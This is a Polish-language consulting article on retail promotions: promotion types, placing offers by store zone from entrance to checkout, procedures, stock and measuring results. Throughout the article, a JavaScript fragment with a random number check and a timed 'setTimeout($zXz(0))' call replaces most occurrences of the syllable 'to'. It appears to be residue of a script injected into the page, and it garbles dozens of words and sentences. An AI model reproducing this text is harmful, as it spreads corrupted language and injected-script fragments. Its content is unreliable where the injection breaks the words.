In Artykuły, Handel, Uniwersalne

Promocja zwykle sprowadza się do wyróżnienia. Wyróżnienia jakiegoś produktu jakąś korzyścią dla klienta, czasem wyróżnienia miejscem (specyficznym i najlepiej dopasowanym do charakteru produktu i promocji).

Promocja dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie jedyne wyjście

Promocja dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wciąż jeden z najpowszechniejszych, choć wcale nie najskuteczniejszych sposobów zarządzania magiczną formułą sprzedaży. War dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to więc poznać ich reguły.

Decydując się jednak na promocje (najgorszy chyba sposób, drogi, w dodatku służy głównie dostawcom przez wewnętrzną kanibalizację), war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wiedzieć, jak jednak zrobić dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to efektywniej.

Uwaga. „w długi okresie”. Jeśli komuś nie udała się promocja, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zwykle próbuje się bronić zdaniem „w długim okresie..”. To niezrozumienie. Promocja nie ma działać w długim okresie (temu służy pozycjonowanie). Ma działać tu i teraz, a jeśli tak nie działa, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to się po prostu nie udała..

Rodzaje promocji

Promocje w firmie mogą być różne. Mogą być ogólnofirmowe, gdzie materiały, komunikacja i lokalizacje są decydowane przez Centralę. Mogą też być lokalne (tylko w jednej placówce). Wtedy są decydowane lokalnie, zwykle jednak w ramach ustalonych przez „górę”.

Mogą też być promocje jeszcze bardziej lokalne, czyli istnieć tylko w jednym miejscu. Wtedy dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to promocje „zlokalizowane”. Jeśli dopasuje się charakterystykę miejsca (klienta) i produktu, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to efekty takiej promocji mogą być spektakularne.

Rodzaje promocji. To, czy promocja jest centralna, lokalna czy „bardzo lokalna” ma duże znaczenie operacyjne. Z jednej strony determinuje wybór produktu, z drugiej kanału komunikacji.

Rodzaje promocji mają największe znaczenie dla sposobu komunikacji. Dla tych ogólnofirmowych zwykle wydaje się więcej na marketing. To efekt skali promocji, gdzie wydatki marketingowe rozkładają się na większy wolumen sprzedaży. Chętniej też takie promocje wspierają dostawcy, im też zależy na

Rodzaj promocji ma też znaczenie dla wyboru produktu. Promocje centralne na ogół są inicjowane co najmniej w porozumieniu z dostawcą czy dysponentem marki. A częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to są wręcz przez nich inicjowane i mają działać (w założeniu) przede wszystkim w ich interesie. W promocji lokalnej tak zdarza się już rzadko. To zaś paradoksalnie prowadzi do tego, że promocje lokalne służą sprzedającemu w znaczenie większym s dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}topniu, niż te centralne, choć te ostatnie są znacznie bardziej spektakularne.

Uwaga. „skuteczność promocji”. Dopasowując produkt i komunikację do charakteru promocji war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to od razu zastanowić się, jak zmierzyć, czy się udało. Najlepszy znany mi sposób dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to przejście przez magiczną formułę promocji, a więc najpierw założenie, a następnie sprawdzenie, na który składnik formuły (wejścia, konwersja, średnia transakcja) ma wpłynąć promocja.

Reguły promocji

Niezależnie od miejsca, w którym znajduje się konkretna promocja, rządzą nimi pewne stałe reguły.

Są jednak także reguły specyficzne tylko dla tego miejsca. Jedne i drugie war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to znać, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to podstawa skutecznego zarządzania magiczną formułą sprzedaży przy pomocy promocji.

Rodzaje promocji zlokalizowanych. Promocja zawsze jest gdzieś zlokalizowana. Ale te zlokalizowane dopasowują produkt i sposób ekspozycji do charakteru miejsca. Wtedy skuteczność takiej promocji może wzrosnąć kilkukrotnie, w s dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosunku do tej samej promocji, ale już bez tego dopasowania.

Rolą promocji „ogólnoplacówkowej” jest zamiana klienta całkowicie potencjalnego (ale jednak potencjalnego) „Apacza” („a ja tylko pacze”), w klienta kupującego. Zaś w strefie przykasowej (gdzie klient jest już najczęściej zdeterminowany), zwiększenie war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tości paragonu, szczególnie o produkty tyleż impulsowe, co wysokomarżowe.

Połączyć „dobry” produkt z „dobrym” miejscem

Dobry dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to znaczy dopasowany do miejsca.

Gdzie co powinno się znajdować? Najlepiej dopasować charakter promocji do charakteru ruchu. Zarówno do natężenia (tu chodzi głównie o impulsowe działanie promocji) jak i do charakteru (np. po drodze do działu z takimi produktami).

Jak dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to działa? Po kolei.

Przedsklepie. Przed wejściem powinny być produkty, które zachęcają do wejścia, choć później wcale się nie sprzedają (zanim dojdą do działu, a tym bardziej do kasy, klienci i tak zapominają.

Uwaga. „nowości”. To szczególny rodzaj dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towaru. Jeśli umieścić go w głębi sklepu, częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to umknie uwadze. Dlatego dobrym sposobem jest wykorzystanie do ich prezentacji strefy wejścia.

Strefa wejścia. Tu trzeba rozpocząć proces kupowania, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie tylko zwiększanie konwersji „czy”, ale przede wszystkim „kiedy”. A skoro tak (dzięki temu klienci wcześniej zaczną kupować, nikt nie będzie stał przecież do kasy po jeden mały produkt), dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to coś poświęcić. Czyli sprzedawać tanio i z niską marżą, ale sprzedawać. Czyli produkty ENO.

Uwaga. „wielkość produktów”. Umieszczanie przy wejściu produktów o dużych gabarytach dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie jest dobry pomysł. Klient od razu pomyśli „trzeba dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to będzie taszczyć przez cały sklep”. I zrezygnuje.

Główna droga komunikacyjna. Dalej jest zwykle główna droga komunikacyjna. To strefa ruchu, w szczególności, z punktu widzenia działu, ruchu przypadkowego. Tu czas na konwersję, ale raczej tą „czy”. Więc nadal dobre oferty, ale już nie tak tanie jak na wejściu, nie będzie czasu odrobić marży.

Uwaga. „koszyki”. Sprzedając promocyjnie, szczególnie impulsowo nie tylko trzeba pomyśleć o produkcie dobranym do miejsca. Trzeba też pomyśleć o logistyce, czyli o tym, jak klient ma go zabrać ze sobą. Zawsze w pobliżu powinny być koszyki, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}torby czy wózki. Inaczej promocja będzie dobrze dobrana pod względem miejsca i produktu, a i tak się nie uda. Gdyż nikt nie dowiezie produktu do kasy.

Dział. To strefa ruchu dedykowanego. Tu klienci przychodzą na ogół dlatego, że szukają czegoś konkretnego. To strefa promocji typu add-on, czyli akcesoriów, które pasują do produktu głównego sprzedawanego w danym dziale.

Kasa. Strefa przykasowa dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to strefa ostatniej szansy. Tu już nie trzeba przekonywać klienta do zakupu w ogóle ( dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to już się stało, inaczej by go tu w ogóle nie było). Ale war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to mu coś podsunąć, co mu się przyda, gdzie nie będzie porównywał cen, a za dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wykorzysta czas, który i tak, choć niechętnie, poświęca detaliście w tym miejscu.

Procedura

Nie wystarczy wybrać produktów i wyznaczyć im miejsca. Trzeba jeszcze przekuć dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to na codzienną rzeczywis dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tość, a do tego służy na ogół procedura. Żeby zadziałała, musi składać się co najmniej z kilku elementów. Trzeba wybrać produkty (a raczej zasady ich wybierania), znaleźć i wyznaczyć miejsca, ustalić częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}totliwość zmian, zapewnić odpowiedni zapas. Do tego trzeba też wyznaczyć osobę odpowiedzialną i pilnować stałego podsumowywania skuteczności.

Procedura musi też być pisemna i przedysku dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towana ze sklepami.

Follow-up

Co sprawdzać? Celem jest maksymalizowanie sprzedaży (marży) z określonej strefy. Łącznie. Więc i tak trzeba mierzyć skuteczność.

Zapas

Żeby sprzedawać dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towar impulsowy, potrzebny jest zapas. Tu nie można stawiać na produkty na zamówienie. Tego zapasu musi być odpowiednio dużo.

To częsty błąd. W obawie, że zostanie (słusznej) firma stara się wyprzedać dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towar do końca promocji. A dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to z założenia osłabia jej działanie, szczególnie w końcowej fazie. I tak firma sama sobie pogarsza skuteczność, zamiast spróbować rozwiązać problem zapasu na koniec promocji.

Podsumowanie

Promocja ma wyróżniać. A przez dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, że wyróżnia ma sprzedawać. Ale sprzedawać więcej niż do tej pory. A dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to można uzyskać tylko przez wpływ na magiczną formułę sprzedaży, albo przez wejścia (kontakty z firmą), zwiększoną konwersję lub powiększoną średnią war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tość transakcji. Albo jeden z tych elementów osobno, albo najlepiej wszystkie na raz.

Podnieś efektywność biznesu już dziś!

Aby wdrożyć FRAME w Twojej firmie, wystarczy się z nami skontaktować.